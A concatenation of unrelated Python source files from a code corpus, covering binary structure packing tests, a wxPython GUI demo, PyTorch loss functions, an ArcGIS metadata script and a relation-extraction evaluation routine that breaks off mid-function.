# DCE-RPC/NDR string specifier
if format[:1] == 'w':
l = unpack('<L', b(data[:4]))[0]
return 12+l*2
# literal specifier
if format[:1] == ':':
return len(data)
# struct like specifier
return calcsize(format)
def calcPackFieldSize(self, fieldName, format = None):
if format is None:
format = self.formatForField(fieldName)
return self.calcPackSize(format, self[fieldName])
def formatForField(self, fieldName):
for field in self.commonHdr+self.structure:
if field[0] == fieldName:
return field[1]
raise Exception("Field %s not found" % fieldName)
def findAddressFieldFor(self, fieldName):
descriptor = '&%s' % fieldName
l = len(descriptor)
for field in self.commonHdr+self.structure:
if field[1][-l:] == descriptor:
return field[0]
return None
def findLengthFieldFor(self, fieldName):
descriptor = '-%s' % fieldName
l = len(descriptor)
for field in self.commonHdr+self.structure:
if field[1][-l:] == descriptor:
return field[0]
return None
def dump(self, msg = None, indent = 0, print_to_stdout = True):
if msg is None:
msg = self.__class__.__name__
ind = ' '*indent
allstr = "\n%s" % msg
fixedFields = []
for field in self.commonHdr+self.structure:
i = field[0]
if i in self.fields:
fixedFields.append(i)
if isinstance(self[i], Structure):
tempstr = self[i].dump('%s%s:{' % (ind, i), indent = indent + 4, print_to_stdout = False)
allstr += tempstr + "\n%s}" % ind
else:
allstr += "\n%s%s: {%r}" % (ind, i, self[i])
# Do we have remaining fields not defined in the structures? let's
# print them.
remainingFields = list(set(self.fields) - set(fixedFields))
for i in remainingFields:
if isinstance(self[i], Structure):
tempstr = self[i].dump('%s%s:{' % (ind, i), indent = indent + 4, print_to_stdout = False)
allstr += tempstr + "\n%s}" % ind
else:
allstr += "\n%s%s: {%r}" % (ind, i, self[i])
# Finish job.
if not print_to_stdout:
# print(allstr) # Uncomment this line only for view that test is OK with "print_to_stdout = False".
return allstr
else:
print(allstr)
class _StructureTest:
alignment = 0
def create(self,data = None):
if data is not None:
return self.theClass(data, alignment = self.alignment)
else:
return self.theClass(alignment = self.alignment)
def run(self):
print()
print("-"*70)
testName = self.__class__.__name__
print("starting test: %s....." % testName)
a = self.create()
self.populate(a)
a.dump("packing.....")
a_str = a.getData()
print("packed: %r, %d" % (a_str,len(a_str)))
print("unpacking.....")
b = self.create(a_str)
b.dump("unpacked.....")
print("repacking.....")
b_str = b.getData()
if b_str != a_str:
print("ERROR: original packed and repacked don't match")
print("packed: %r" % b_str)
class _Test_simple(_StructureTest):
class theClass(Structure):
commonHdr = ()
structure = (
('int1', '!L'),
('len1','!L-z1'),
('arr1','B*<L'),
('z1', 'z'),
('u1','u'),
('', '"COCA'),
('len2','!H-:1'),
('', '"COCA'),
(':1', ':'),
('int3','>L'),
('code1','>L=len(arr1)*2+0x1000'),
)
def populate(self, a):
a['default'] = 'hola'
a['int1'] = 0x3131
a['int3'] = 0x45444342
a['z1'] = 'hola'
a['u1'] = 'hola'.encode('utf_16_le')
a[':1'] = ':1234:'
a['arr1'] = (0x12341234,0x88990077,0x41414141)
# a['len1'] = 0x42424242
class _Test_fixedLength(_Test_simple):
def populate(self, a):
_Test_simple.populate(self, a)
a['len1'] = 0x42424242
class _Test_simple_aligned4(_Test_simple):
alignment = 4
class _Test_nested(_StructureTest):
class theClass(Structure):
class _Inner(Structure):
structure = (('data', 'z'),)
structure = (
('nest1', ':', _Inner),
('nest2', ':', _Inner),
('int', '<L'),
)
def populate(self, a):
a['nest1'] = _Test_nested.theClass._Inner()
a['nest2'] = _Test_nested.theClass._Inner()
a['nest1']['data'] = 'hola manola'
a['nest2']['data'] = 'chau loco'
a['int'] = 0x12345678
class _Test_Optional(_StructureTest):
class theClass(Structure):
structure = (
('pName','<L&Name'),
('pList','<L&List'),
('Name','w'),
('List','<H*<L'),
)
def populate(self, a):
a['Name'] = 'Optional test'
a['List'] = (1,2,3,4)
class _Test_Optional_sparse(_Test_Optional):
def populate(self, a):
_Test_Optional.populate(self, a)
del a['Name']
class _Test_AsciiZArray(_StructureTest):
class theClass(Structure):
structure = (
('head','<L'),
('array','B*z'),
('tail','<L'),
)
def populate(self, a):
a['head'] = 0x1234
a['tail'] = 0xabcd
a['array'] = ('hola','manola','te traje')
class _Test_UnpackCode(_StructureTest):
class theClass(Structure):
structure = (
('leni','<L=len(uno)*2'),
('cuchi','_-uno','leni/2'),
('uno',':'),
('dos',':'),
)
def populate(self, a):
a['uno'] = 'soy un loco!'
a['dos'] = 'que haces fiera'
class _Test_AAA(_StructureTest):
class theClass(Structure):
commonHdr = ()
structure = (
('iv', '!L=((init_vector & 0xFFFFFF) << 8) | ((pad & 0x3f) << 2) | (keyid & 3)'),
('init_vector', '_','(iv >> 8)'),
('pad', '_','((iv >>2) & 0x3F)'),
('keyid', '_','( iv & 0x03 )'),
('dataLen', '_-data', 'len(inputDataLeft)-4'),
('data',':'),
('icv','>L'),
)
def populate(self, a):
a['init_vector']=0x01020304
#a['pad']=int('01010101',2)
a['pad']=int('010101',2)
a['keyid']=0x07
a['data']="\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9"
a['icv'] = 0x05060708
#a['iv'] = 0x01020304
if __name__ == '__main__':
_Test_simple().run()
try:
_Test_fixedLength().run()
except:
print("cannot repack because length is bogus")
_Test_simple_aligned4().run()
_Test_nested().run()
_Test_Optional().run()
_Test_Optional_sparse().run()
_Test_AsciiZArray().run()
_Test_UnpackCode().run()
_Test_AAA().run()
| StarcoderdataPython |
6482146 | # -*- coding: utf-8 -*-
import wx
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, -1, "Radio Demo", wx.DefaultPosition, (300, 300))
panel = wx.Panel(self)
# 单选框
wx.RadioButton(panel, -1, "AAA", (60, 10), style=wx.RB_GROUP) # RB_GROUP表示一个组的开始
wx.RadioButton(panel, -1, "BBB", (60, 30)) # 归属于上一个RB_GROUP
self.radio3 = wx.RadioButton(panel, -1, "aaa", (60, 60), style=wx.RB_GROUP) # 新的RB_GROUP表示一个新组的开始
self.radio4 = wx.RadioButton(panel, -1, "bbb", (60, 80))
self.radio3.Bind(wx.EVT_RADIOBUTTON, self.onRadio1)
self.radio4.Bind(wx.EVT_RADIOBUTTON, self.onRadio2)
# 单选框组合
list1 = ["radio5", "radio6"]
list2 = ['radio7', 'radio8']
self.rb1 = wx.RadioBox(panel, -1, "Group One", (60, 110), wx.DefaultSize, list1, 2, wx.RA_SPECIFY_COLS)
self.rb2 = wx.RadioBox(parent=panel, # 父对象
id=-1, # ID
label="Group Two", # 标签名,可以省略
pos=(60, 170), # 位置
size=wx.DefaultSize, # 大小
choices=list2, # 使用的列表
majorDimension=2, # 显示的行数或列数
style=wx.RA_SPECIFY_ROWS) # 样式
self.rb1.Bind(wx.EVT_RADIOBOX, self.onRadioBox1)
self.rb2.Bind(wx.EVT_RADIOBOX, self.onRadioBox2)
def onRadio1(self, event):
print("# aaa - ", self.radio3.GetValue())
def onRadio2(self, event):
print("$ bbb - ", self.radio4.GetValue())
def onRadioBox1(self, event):
print("# list1 - ", self.rb1.GetSelection())
def onRadioBox2(self, event):
print("$ list2 - ", self.rb2.GetSelection())
if __name__ == "__main__":
app = wx.App()
frame = MyFrame()
frame.Show()
app.MainLoop()
# ### 控件
# 使用已有控件可以简洁地创建一些界面,简化GUI编程;
# 标准控件包括单选框、复选框、列表框、组合框等;
#
# ### 单选框(wx.RadioButton类)
# https://docs.wxpython.org/wx.RadioButton.html
# 多个选项中选择其中的一个时,其他的选项会自动被设置为未选中状态;
#
# ### 单选框分组(wx.RadioBox类)
# https://docs.wxpython.org/wx.RadioBox.html
# 相关的单选框放置在同一组,但只能选择其中的一个选项,其他的单选框会自动被设置为未选中状态;
# 常用函数:
# - GetCount() - 返回单选框分组中选项的数量
# - FindString(string) - 根据给定的标签返回相关按钮的整数索引值,如果标签不存在,则返回-1
# - EnabelItem(n,flag) - 设置索引为n的按钮是否有效,flag是一个布尔值
# - SetItemLabel(n,string) - 设置索引为n的按钮的字符串标签
# - GetItemLabel(n) - 获取索引为n的按钮的字符串标签
# - GetSelection() - 获取被选择的整数索引
# - GetStringSelection() - 获取被选择的字符串信息
# - SetSelection(n) - 使索引为n的单选框被选中
| StarcoderdataPython |
1803118 | <gh_stars>1-10
from setuptools import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(name='python-spectacles',
version='1.4.2',
description='Description',
author=u'<NAME>',
license='MIT',
packages=['spectacles'],
install_requires=[
'splinter==0.7.5',
'requests==2.10.0',
'PyYAML==3.11',
'click==6.6'
],
zip_safe=False) | StarcoderdataPython |
6478957 | from typing import Set
from xml.etree import ElementTree
from linty_fresh.problem import TestProblem
def parse(contents: str, **kwargs) -> Set[TestProblem]:
result = set()
try:
root = ElementTree.fromstring(contents)
except ElementTree.ParseError:
return result
for test in root.findall('test'):
if test.get('status') == 'FAIL':
test_group = test.get('name')
for tr in test.findall('testresult'):
message = None
stack_trace = None
for m in tr.findall('message'):
if m.text:
message = m.text
for st in tr.findall('stacktrace'):
if st.text:
stack_trace = st.text
if stack_trace and message:
test_name = tr.get('name')
result.add(TestProblem(
test_group,
test_name,
message,
stack_trace
))
return result
| StarcoderdataPython |
1844224 | <filename>interspeechmi/src/interspeechmi/data_handling/constants.py
import os
from interspeechmi.constants import DATA_DIR
ANNO_MI_DATA_DIR = os.path.join(DATA_DIR, "anno_mi")
ANNO_MI_PREPROCESSED_DATA_DIR = os.path.join(ANNO_MI_DATA_DIR, "preprocessed")
for data_dir in [
ANNO_MI_DATA_DIR,
ANNO_MI_PREPROCESSED_DATA_DIR,
]:
if not os.path.isdir(data_dir):
os.mkdir(data_dir)
###########################################################################
ANNO_MI_URL = "https://github.com/uccollab/AnnoMI/archive/refs/heads/main.zip"
ANNO_MI_DATASET_ZIP_PATH = os.path.join(ANNO_MI_DATA_DIR, "anno_mi_dataset.zip")
ANNO_MI_DATASET_DIR = os.path.join(ANNO_MI_DATA_DIR, "anno_mi_dataset")
ANNO_MI_PATH = os.path.join(ANNO_MI_DATASET_DIR, "dataset.csv")
ANNO_MI_NORMALIZED_PATH = os.path.join(ANNO_MI_PREPROCESSED_DATA_DIR, "dataset.normalized.csv")
ANNO_MI_NORMALIZED_AUGMENTED_PATH = os.path.join(ANNO_MI_PREPROCESSED_DATA_DIR, "dataset.normalized.augmented.csv")
###########################################################################
| StarcoderdataPython |
8088026 | <gh_stars>10-100
# This module is used as a placeholder for the registration of test models.
# It is intentionally empty; individual tests create and register models
# that will appear to Django as if they are in this module.
from __future__ import unicode_literals
from django.db import models
class BaseTestModel(models.Model):
"""Base class for test-created models.
This is intended to be used for all models that are created during unit
test runs. It sets the appropriate app to ensure that models aren't
grouped under the ``django_evolution`` app.
"""
class Meta:
abstract = True
app_label = 'tests'
| StarcoderdataPython |
1716518 | ## Note that Metadata Translation tools must run in 32-bit Python.
import sys, os, os.path, arcpy
from GeMS_utilityFunctions import *
from xml.dom.minidom import *
import codecs
debug = False
versionString = 'GeMS_FGDC1_Arc10.py, version of 5 October 2021'
rawurl = 'https://raw.githubusercontent.com/usgs/gems-tools-arcmap/master/Scripts/GeMS_FGDC1_Arc10.py'
checkVersion(versionString, rawurl, 'gems-tools-arcmap')
addMsgAndPrint(' '+ versionString)
if debug:
addMsgAndPrint(os.sys.path)
addMsgAndPrint('Python version = '+str(sys.version))
gems = 'GeMS'
gemsFullRef = '"GeMS (Geologic Map Schema)--a standard format for the digital publication of geologic maps", available at http://ngmdb.usgs.gov/Info/standards/GeMS/'
eaoverviewCitation = 'Detailed descriptions of entities, attributes, and attribute values are given in metadata for constituent elements of the database. See also '+gemsFullRef+'.'
translator = arcpy.GetInstallInfo("desktop")["InstallDir"]+'Metadata/Translator/ARCGIS2FGDC.xml'
###########################################
def __newElement(dom,tag,text):
nd = dom.createElement(tag)
ndText = dom.createTextNode(str(text).decode("utf-8"))
nd.appendChild(ndText)
return nd
def __appendOrReplace(rootNode,newNode,nodeTag):
if len(rootNode.getElementsByTagName(nodeTag)) == 0:
rootNode.appendChild(newNode)
else:
rootNode.replaceChild(newNode,rootNode.getElementsByTagName(nodeTag)[0])
def purgeChildren(dom,nodeTag):
nodes = dom.getElementsByTagName(nodeTag)
for aNode in nodes:
while len(aNode.childNodes) > 0:
aNode.removeChild(aNode.lastChild)
return dom
def eaoverviewDom(dom,eainfo,eaoverText,edcTxt):
overview = dom.createElement('overview')
eaover = __newElement(dom,'eaover',eaoverText)
overview.appendChild(eaover)
eadetcit = __newElement(dom,'eadetcit',edcTxt)
overview.appendChild(eadetcit)
eainfo.appendChild(overview)
return dom
def addSupplinf(dom,supplementaryInfo):
try:
rtNode = dom.getElementsByTagName('descript')[0]
except:
rootNode = dom.getElementsByTagName('idinfo')[0]
descNode = __newElement(dom,'descript','')
rootNode.appendChild(descNode)
rtNode = dom.getElementsByTagName('descript')[0]
siNode = __newElement(dom,'supplinf',supplementaryInfo)
__appendOrReplace(rtNode,siNode,'supplinf')
return dom
def writeGdbDesc(gdb):
desc = 'Database '+os.path.basename(gdb)+' contains the following elements: '
arcpy.env.workspace = gdb
for aTable in arcpy.ListTables():
desc = desc+'non-spatial table '+ aTable+' ('+str(numberOfRows(aTable))+' rows); '
for anFds in arcpy.ListDatasets():
desc = desc + 'feature dataset '+anFds+' which contains '
fcs = arcpy.ListFeatureClasses('','All',anFds)
if len(fcs) == 1:
desc = desc + 'feature class '+fcs[0]+' ('+str(numberOfRows(fcs[0]))+' features); '
else:
for n in range(0,len(fcs)-1):
desc = desc+'feature class '+fcs[n]+' ('+str(numberOfRows(fcs[n]))+' features), '
lastn = len(fcs)-1
desc = desc+'and feature class '+fcs[lastn]+' ('+str(numberOfRows(fcs[lastn]))+' features); '
desc = desc[:-2]+'. '
return desc
def writeDomToFile(workDir,dom,fileName):
if debug:
addMsgAndPrint(arcpy.env.workspace)
addMsgAndPrint('fileName='+fileName)
outf = os.path.join(workDir,fileName)
with codecs.open(outf, "w", encoding="utf-8", errors="xmlcharrefreplace") as out:
dom.writexml(out, encoding="utf-8")
###########################################
inGdb = sys.argv[1]
inGdb = os.path.abspath(inGdb)
wksp = os.path.dirname(inGdb)
xmlGdb = inGdb[:-4]+'-metadata.xml'
mrXML = xmlGdb
dataSources = os.path.join(inGdb, 'DataSources')
addMsgAndPrint(' DataSources = '+dataSources)
# export master record
if debug:
addMsgAndPrint(' inGdb = '+inGdb)
addMsgAndPrint(' translator = '+translator)
addMsgAndPrint(' mrXML = '+mrXML)
if os.path.exists(mrXML):
os.remove(mrXML)
arcpy.ExportMetadata_conversion(inGdb,translator,mrXML)
addMsgAndPrint(' Metadata for '+os.path.basename(inGdb)+' exported to file ')
addMsgAndPrint(' '+mrXML)
# parse mrXML to DOM
try:
with open(mrXML) as xml:
domMR = parse(xml)
#domMR = xml.dom.minidom.parse(mrXML)
addMsgAndPrint(' Master record parsed successfully')
except:
addMsgAndPrint(arcpy.GetMessages())
addMsgAndPrint('Failed to parse '+mrXML)
raise arcpy.ExecuteError
sys.exit()
# add supplinfo
addMsgAndPrint(' Adding supplinfo')
gdbDesc1 = (' is a composite geodataset that conforms to '+gemsFullRef+'. '+
'Metadata records associated with each element within the geodataset contain '+
'more detailed descriptions of their purposes, constituent entities, and attributes. ')
gdbDesc2 = ('An OPEN shapefile versions of the dataset is also available. It consists '+
'of shapefiles, DBF files, and delimited text files and retains all information in the native '+
'geodatabase, but some programming will likely be necessary to assemble these components into '+
'usable formats.')
supplementaryInfo = os.path.basename(inGdb)+gdbDesc1+gdbDesc2
supplementaryInfo = supplementaryInfo+ ' These metadata were prepared with the aid of script '+versionString+'.'
domMR = addSupplinf(domMR,supplementaryInfo)
# identify/create dataqual node
addMsgAndPrint(' Adding dataqual')
try:
dataqual = domMR.getElementsByTagName('dataqual')[0]
except:
rtNode = domMR.getElementsByTagName('metadata')[0]
dataqual = domMR.createElement('dataqual')
rtNode.appendChild(dataqual)
# dataqual/attracc/attraccr (statement referring user to IdConf and ExConf fields)
attraccrText = 'Confidence that a feature exists and confidence that a feature is correctly identified are described in per-feature attributes ExistenceConfidence and IdentityConfidence.'
attraccr = __newElement(domMR,'attraccr',attraccrText)
attracc = domMR.createElement('attracc')
attracc.appendChild(attraccr)
dataqual.appendChild(attracc)
# dataqual/posacc/horizpa/horizpar (statement referring user to LCM fields in fc)
horizparText = 'Estimated accuracy of horizontal location is given on a per-feature basis by attribute LocationConfidenceMeters. Values are expected to be correct within a factor of 2. A LocationConfidenceMeters value of -9 or -9999 indicates that no value has been assigned.'
horizpar = __newElement(domMR,'horizpar',horizparText)
horizpa = domMR.createElement('horizpa')
posacc = domMR.createElement('posacc')
horizpa.appendChild(horizpar)
posacc.appendChild(horizpa)
dataqual.appendChild(posacc)
# add dataqual/lineage/srcinfo
if arcpy.Exists(dataSources):
if numberOfRows(dataSources) > 0:
## lineage node
try:
lineage = domMR.getElementsByTagName('lineage')[0]
except:
rtNode = domMR.getElementsByTagName('dataqual')[0]
lineage = domMR.createElement('lineage')
rtNode.appendChild(lineage)
## get rid of any existing srcinfo nodes
domMr = purgeChildren(domMR,'srcinfo')
## add successive srcinfo nodes
fields = ['DataSources_ID','Source','Notes','URL']
## for each row in dataSources, create
## srcinfo
## srccite
## citeinfo
## title Source
## onlink URL
## srccitea DataSource_ID
with arcpy.da.SearchCursor(dataSources, fields) as cursor:
for row in cursor:
addMsgAndPrint(row[0])
srcinfo = domMR.createElement('srcinfo')
srccite = domMR.createElement('srccite')
citeinfo = domMR.createElement('citeinfo')
titleText = str(row[1].encode("ASCII",'ignore'))
if row[2] <> None:
titleText = titleText + ' '+str(row[2])
title = __newElement(domMR,'title',titleText)
citeinfo.appendChild(title)
if row[3] <> None:
onlink = __newElement(domMR,'onlink',row[3])
citeinfo.appendChild(onlink)
srccite.appendChild(citeinfo)
srcinfo.appendChild(srccite)
srccitea = __newElement(domMR,'srccitea',row[0])
srcinfo.appendChild(srccitea)
lineage.appendChild(srcinfo)
### add eaoverview
addMsgAndPrint(' Adding eainfo')
# get rid of any existing eainfo
domMr = purgeChildren(domMR,'eainfo')
# ensure that there is an eainfo node
try:
addMsgAndPrint(' getting eainfo 1a')
eanode = domMR.getElementsByTagName('eainfo')[0]
except:
addMsgAndPrint(' getting eainfo 1b')
rtNode = domMR.getElementsByTagName('metadata')[0]
addMsgAndPrint(' getting eainfo 1b1')
eanode = domMR.createElement('eainfo')
addMsgAndPrint(' getting eainfo 1b2')
rtNode.appendChild(eanode)
addMsgAndPrint(' getting eainfo 3')
eainfo = domMR.getElementsByTagName('eainfo')[0]
addMsgAndPrint(' getting eainfo 4')
gdbDesc = writeGdbDesc(inGdb) # listing of all tables, feature datasets, feature classes
addMsgAndPrint(' getting eainfo 5')
domMR = eaoverviewDom(domMR,eainfo,gdbDesc,eaoverviewCitation)
# write domMR to mrXML
testAndDelete(mrXML)
addMsgAndPrint(' Writing Dom to file')
writeDomToFile(wksp,domMR,mrXML)
addMsgAndPrint('DONE')
| StarcoderdataPython |
1925397 | #!/usr/bin/env python
import sys
import sqlite3
import numpy as np
import matplotlib.pyplot as plt
BINSIZE = 10
def _main(args):
if len(args) != 3:
print ("usage: mgap_txn_start_motif_count.py <mgap_motif_db> <xls> <window>")
sys.exit(1)
con = sqlite3.connect(args[0])
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("""select * from matrix""")
matrices = cur.fetchall()
win = int(args[2])
hit_cnt = {}
for m in matrices:
hit_cnt[m['name']] = 0
total = 0
dir = {}
for ln in open(args[1]):
total += 1
sp = ln[:-1].split()
pk = int(sp[1]) + int(sp[4])
# cur.execute("""SELECT * FROM patser_hit WHERE ((matrix_key = ?) AND ((chr = ? ) AND (start BETWEEN ? AND ?)))""",('dpse_her',sp[0],pk - win,pk + win))
# dp_hits = cur.fetchall()
# dir = 0
# if len(dp_hits) > 1:
# if dp_hits[0]['strand'] == '+':
# dir = 1
# else:
# dir = -1
for m in matrices:
cur.execute("""SELECT * FROM patser_hit WHERE ((matrix_key = ?) AND ((chr = ?) AND (start BETWEEN ? AND ?)))""",(m['matrix_key'],sp[0],pk - win,pk + win))
if len(cur.fetchall()) > 0:
hit_cnt[m['name']] += 1
# for hit in cur.fetchall():
# if dir > -1:
# hit_cnt[m['name']][(hit['start'] - (pk - win))/BINSIZE] += 1
# else:
# hit_cnt[m['name']][-(hit['start'] - (pk - win))/BINSIZE] += 1
for (name,cnt) in hit_cnt.items():
print "%s\t%d\t%f" % (name,cnt,float(cnt)/total)
if __name__ == "__main__":
_main(sys.argv[1:])
| StarcoderdataPython |
8017931 | <gh_stars>0
import cv2
import numpy as np
def draw_mask(img, image_bg, bbox, labels):
global mask
global masked_img
alpha = 0.95
mask=[]
masked_img_final=[]
#print('bboxt: ' + str(type(bbox)) + '\n')
bbox=np.array(bbox)
#img = np.array(img)
print('bbox: ' + str(bbox) + '\n')
#print('labels: '+str(labels)+'\n')
#print('img: '+str(img.shape)+'\n')
masked_bg = np.full((img.shape[0], img.shape[1]), 0, dtype="uint8")
for i,l in enumerate(labels):
#print('bbox: '+str(bbox[i])+'\n')
crop_obj = img[bbox[i][1]:bbox[i][3], bbox[i][0]:bbox[i][2]]
#cv2.imshow('',crop_obj)
#cv2.waitKey()
crop_obj = cv2.normalize(crop_obj.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
crop_bg = image_bg[bbox[i][1]:bbox[i][3], bbox[i][0]:bbox[i][2]]
#cv2.imshow('', crop_bg)
#cv2.waitKey()
crop_bg = cv2.normalize(crop_bg.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
#cv2.imshow('', crop_bg)
#cv2.waitKey()
try:
crop_bg_w = alpha * crop_bg + (1 - alpha) * crop_obj
except:
print('NoneType!')
print('bg:' + str(crop_bg_w) + '\nobj:' + str(crop_obj))
exit()
mask=cv2.cvtColor((abs(crop_obj-crop_bg)*255).astype(np.uint8),cv2.COLOR_BGR2GRAY)
#cv2.imshow('', mask)
#cv2.waitKey()
#Otsu Thresholding
#ret, th = cv2.threshold(mask, 0, 255, cv2.THRESH_OTSU)
#mask = np.invert(th)
# Otsu's thresholding after Gaussian filtering
blur = cv2.GaussianBlur(mask, (5, 5), 0)
#mask = cv2.medianBlur(mask, 5)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
mask=th3
#mask = np.invert(th3)
#print(mask)
#cv2.imshow('', mask)
#cv2.waitKey()
#masked_img = np.full((img.shape[0], img.shape[1]),0,dtype="uint8")
#masked_img = np.zeros((img.shape[0], img.shape[1]), dtype="uint8")
#print('mask shape: '+str(mask.shape)+', img: '+str(masked_img.shape)+'\n')
#print('mask_sum: ' + str(np.sum(mask))+'\n')
#for r,row in enumerate(range(bbox[i][1], min([bbox[i][3],bbox.shape[0]]))):
#for c,col in enumarate(range(bbox[i][0], min([bbox[i][2],bbox.shape[1]]))):
#masked_img[row, col] = mask[r, c]
#masked_img[row, col] = 255
#print("masked_bg.shape",masked_bg.shape)
#print("mask",mask.shape)
masked_bg[bbox[i][1]:bbox[i][3],bbox[i][0]:bbox[i][2]] = mask
masked_img=cv2.cvtColor(masked_bg,cv2.COLOR_GRAY2RGB)
#print('masked_img_sum: ' + str(np.sum(masked_img)) + '\n')
#cv2.imshow('', masked_img)
#cv2.waitKey()
#masked_img_final=np.hstack([masked_img_final,masked_img])
#print('masked_img',masked_img)
#masked_img_final.append(masked_img)
#print('masked_img_final',masked_img_final)
#masked_img_final=sum(masked_img_final)
return masked_img | StarcoderdataPython |
6408510 | import torch
import torch.nn as nn
import torch.nn.functional as F
from . import metric_utils
class DiceLoss():
'''
http://campar.in.tum.de/pub/milletari2016Vnet/milletari2016Vnet.pdf
https://github.com/faustomilletari/VNet/blob/master/pyLayer.py
https://github.com/pytorch/pytorch/issues/1249
'''
def __init__(self):
self.__class__.__name__ = 'Dice'
def __call__(self, output, target):
return 1.0 - get_torch_dice_score(output, target)
class DiceBCELoss():
def __init__(self, dice_weight=1.0):
self.__class__.__name__ = 'DiceBCE'
self.dice_weight = dice_weight
self.bce_weight = 1.0 - dice_weight
def __call__(self, output, target):
bce = F.binary_cross_entropy(output, target)
dice = 1 - get_torch_dice_score(output, target)
return (dice * self.dice_weight) + (bce * self.bce_weight)
class WeightedBCELoss():
def __init__(self, weights):
self.weights = weights
self.__class__.__name__ = 'WeightedBCE'
def __call__(self, output, target):
return F.binary_cross_entropy(output, target, self.weights)
class KnowledgeDistillLoss():
def __init__(self, target_weight=0.25):
self.__class__.__name__ = 'KnowledgeDistill'
self.target_weight = target_weight
def __call__(self, output, target, soft_target):
target_loss = F.binary_cross_entropy(output, target) * self.target_weight
soft_target_loss = F.binary_cross_entropy(output, soft_target)
return target_loss + soft_target_loss
class HuberLoss():
def __init__(self, c=0.5):
self.c = c
self.__class__.__name__ = 'Huber'
def __call__(self, output, target):
bce = F.binary_cross_entropy(output, target)
return self.c**2 * (torch.sqrt(1 + (bce/self.c)**2) - 1)
class SmoothF2Loss():
def __init__(self, c=10.0, f2_weight=0.2, bce_weight=1.0):
self.__class__.__name__ = 'SmoothF2'
self.c = c
self.f2_weight = f2_weight
self.bce_weight = bce_weight
def __call__(self, output, target, thresholds):
f2 = get_smooth_f2_score(output, target, thresholds, self.c) * self.f2_weight
bce = F.binary_cross_entropy(output, target) * self.bce_weight
return f2 + bce
class L2Norm(nn.Module):
def __init__(self,n_channels, scale):
super().__init__()
self.n_channels = n_channels
self.gamma = scale or None
self.eps = 1e-10
self.weight = nn.Parameter(torch.Tensor(self.n_channels))
self.reset_parameters()
def reset_parameters(self):
nn.init.constant(self.weight,self.gamma)
def forward(self, x):
norm = x.pow(2).sum(dim=1, keepdim=True).sqrt()+self.eps
x /= norm
out = self.weight.unsqueeze(0).unsqueeze(2).unsqueeze(3).expand_as(x) * x
return out
# Helpers / Shared Methods
def get_torch_dice_score(outputs, targets):
eps = 1e-7
batch_size = outputs.size()[0]
outputs = outputs.view(batch_size, -1)
targets = targets.view(batch_size, -1)
total = torch.sum(outputs, dim=1) + torch.sum(targets, dim=1)
intersection = torch.sum(outputs * targets, dim=1).float()
dice_score = (2.0 * intersection) / (total + eps)
return torch.mean(dice_score)
def sigmoid(z, c=1.0):
return 1.0 / (1.0 + torch.exp(-c*z))
def get_smooth_f2_score(outputs, targets, thresholds, c=10.0):
eps = 1e-9
outputs = sigmoid(thresholds - outputs, c).float()
tot_out_pos = torch.sum(outputs, dim=1)
tot_tar_pos = torch.sum(targets, dim=1)
TP = torch.sum(outputs * targets, dim=1)
P = TP / (tot_out_pos + eps)
R = TP / tot_tar_pos + eps
F2 = 5.0 * (P*R / (4*P + R))
return torch.mean(F2) | StarcoderdataPython |
4983589 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# @Version : Python 3.6
import os
import pdb
import json
import argparse
import warnings
from collections import OrderedDict
from functools import total_ordering
from itertools import combinations
import torch
import torch.nn.functional as F
import numpy as np
from sklearn import metrics
from sklearn.exceptions import UndefinedMetricWarning
from tqdm import tqdm
from helper import load_line_json
warnings.filterwarnings(action="ignore", category=UndefinedMetricWarning)
@total_ordering
class Threshold(object):
"""For Precision-Recall Curve"""
def __init__(self, threshold, label, true_label):
self.th = threshold
self.label = label
self.true_label = true_label
self.flag = int(self.label == self.true_label)
def __eq__(self, obj):
return self.th == obj.th
def __lt__(self, obj):
return self.th < obj.th
def compute_metrics_nyth(labels, preds, ids, target_names):
r"""calculate the metrics of NYT-H dataset"""
results = OrderedDict()
results['acc'] = (preds == labels).mean()
results['macro-f1'] = metrics.f1_score(labels, preds, average='macro')
results['macro-recall'] = metrics.recall_score(labels, preds, average='macro')
results['macro-precision'] = metrics.precision_score(labels, preds, average='macro')
results['micro-f1'] = metrics.f1_score(labels, preds, average='micro')
results['micro-recall'] = metrics.recall_score(labels, preds, average='micro')
results['micro-precision'] = metrics.precision_score(labels, preds, average='micro')
report = metrics.classification_report(labels, preds,
digits=4, labels=ids,
target_names=target_names, output_dict=True)
rels = set(target_names)
f1s = list()
ps = list()
rs = list()
for key, val in report.items():
if key in rels and key != 'NA':
ps.append(val['precision'])
rs.append(val['recall'])
f1s.append(val['f1-score'])
non_na_macro_precision = sum(ps)/len(ps)
non_na_macro_recall = sum(rs)/len(rs)
non_na_macro_f1 = sum(f1s)/len(f1s)
results['non_na_macro_precision'] = non_na_macro_precision
results['non_na_macro_recall'] = non_na_macro_recall
results['non_na_macro_f1'] = non_na_macro_f1
results['report'] = report
return results
def evaluate_nyth(model, criterion, logger, processor, config, dataset_name, prefix=""):
r"""evaluate the """
eval_output_dir = os.path.join(config.output_dir, "eval")
if not os.path.exists(eval_output_dir):
os.makedirs(eval_output_dir)
number_of_total_examples = {
'train': processor.num_train_examples,
'dev': processor.num_dev_examples,
'test': processor.num_test_examples,
}
logger.info(f"***** Running evaluation {prefix} *****")
logger.info(f" Num examples = {number_of_total_examples[dataset_name]}")
results = dict()
eval_loss = 0.0
nb_eval_steps = 0
preds = list()
labels = list()
outs = list()
tokens = list()
instance_ids = list()
bag_ids = list()
data_loaders = {
"train": processor.train_loader,
"dev": processor.dev_loader,
"test": processor.test_loader
}
data_loader = data_loaders[dataset_name]
with torch.no_grad():
model.eval()
r"""opennre"""
pred_result = list()
r"""end of opennre"""
for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
if config.task_name == 'sent':
batch = tuple(t.to(config.device) for t in raw_batch[:-2])
rel_labels = batch[4]
bag_labels = batch[5]
instance_id = raw_batch[6]
bag_id = raw_batch[7]
inputs = {
"token2ids": batch[0],
"pos1s": batch[1],
"pos2s": batch[2],
"mask": batch[3],
}
elif config.task_name == 'bag':
batch = tuple(t.to(config.device) for t in raw_batch[:-3])
rel_labels = batch[4]
bag_labels = batch[5]
instance_id = raw_batch[6]
bag_id = raw_batch[7]
inputs = {
